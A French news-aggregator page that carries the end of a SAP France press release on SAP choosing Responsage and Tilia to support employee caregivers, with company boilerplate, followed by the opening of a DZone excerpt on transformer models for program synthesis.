« Tilia se réjouit d’accompagner des entreprises qui inscrivent l’humain au cœur de leurs ambitions et qui font de l’aidance une priorité de leur stratégie de bien-être au travail, » indique Christine Lamidel, Fondatrice et Directrice Générale de Tilia. « Le dispositif Responsage-Tilia simplifie le quotidien des aidants et les rassure sur le bien-être de leur proche. Cela participe in fine au maintien de leur engagement professionnel, une nécessité pour rompre l’isolement auquel les aidants sont souvent confrontés. »
À propos de Responsage
Responsage accompagne les salariés aidants depuis 2013. L’entreprise compte plus de 100 clients (Danone, L’Oréal, Pernod-Ricard, Crédit Agricole, France Télévisions, Pôle emploi…) et couvre plus de 250 000 ayants droit. Responsage s’appuie sur une équipe d’assistants sociaux expérimentés, des bases de données de plus de 70 000 contacts et un outil d’aide à la rédaction expert. Les outils collectent et anonymisent dans des bilans les données sur les salariés accompagnés. L’entreprise peut ainsi orienter ses politiques sociales.
Le service est désormais élargi à l’accompagnement social global. Responsage compte parmi ses actionnaires, Bayard Presse, Danone, Babilou et le fonds d’investissement à impact social PhiTrust. Plus d’informations sur le site de Responsage.
À propos de Tilia
Tilia est un dispositif clé en main qui accompagne les entreprises et directions des ressources humaines désireuses d’épauler leurs collaborateurs confrontés à la situation d’un proche en état de dépendance. Cet accompagnement s’effectue par le biais d’une approche collective comprenant des cycles de conférences de sensibilisation à destination de tous les acteurs de l’entreprise, et d’une approche individuelle dédiée aux aidants. Le service proposé par Tilia a été élaboré dans le but d’apporter du répit aux collaborateurs contraints de conjuguer activité professionnelle et rôle d’aidant, et participer ainsi au maintien des équilibres de temps de vie au quotidien. Tilia assiste toutes les fragilités — maladie, handicap, grand-âge ou suite à un accident de la vie — en vue de faciliter le bien vivre à domicile, d’alléger le quotidien des aidants et de les rassurer quant au bien-être de leur proche fragilisé.
Tilia est une startup engagée (social business), issue d’un programme d’intrapreneuriat du Groupe BNP Paribas, développée par sa Directrice Générale et Fondatrice Christine Lamidel suite à son expérience familiale personnelle, et aujourd’hui accélérée par BNP Paribas Personal Finance. Plus d’informations sur le site Internet et le blog de Tilia. @TiliaOaidants | LinkedIn
À propos de SAP
La stratégie de SAP vise à aider chaque organisation à fonctionner en “entreprise intelligente”. En tant que leader du marché des logiciels d’application d’entreprise, nous aidons les entreprises de toutes tailles et de tous secteurs à opérer au mieux : 77 % des transactions commerciales mondiales entrent en contact avec un système SAP®. Nos technologies de Machine Learning, d’Internet des objets (IoT) et d’analytique avancées aident nos clients à transformer leurs activités en “entreprises intelligentes”. SAP permet aux personnes et aux organisations d’avoir une vision approfondie de leur business et favorise la collaboration afin qu’elles puissent garder une longueur d’avance sur leurs concurrents. Nous simplifions la technologie afin que les entreprises puissent utiliser nos logiciels comme elles le souhaitent – sans interruption. Notre suite d’applications et de services de bout en bout permet aux clients privés et publics de 25 secteurs d’activité dans le monde de fonctionner de manière rentable, de s’adapter en permanence et de faire la différence. Avec son réseau mondial de clients, partenaires, employés et leaders d’opinion, SAP aide le monde à mieux fonctionner et à améliorer la vie de chacun. Pour plus d’informations, visitez le site www.sap.com.
The post SAP choisit le tandem Responsage-Tilia pour accompagner ses salariés aidants appeared first on SAP France News.
Source de l’article sur sap.com
NLP Models for Writing Code: Program Synthesis
Actualités, Méthodes et organisation des process ITCopilot, Codex, and AlphaCode: How Good are Computer Programs that Program Computers Now?
Enabled by the rise of transformers in Natural Language Processing (NLP), we’ve seen a flurry of astounding deep learning models for writing code in recent years. Computer programs that can write computer programs, generally known as the program synthesis problem, have been of research interest since at least the late 1960s (pdf) and early 1970s.
In the 2010s and 2020s, program synthesis research has been re-invigorated by the success of attention-based models in other sequence domains, namely the strategy of pre-training massive attention-based neural models (transformers) with millions or billions of parameters on hundreds of gigabytes of text.
Source de l’article sur DZONE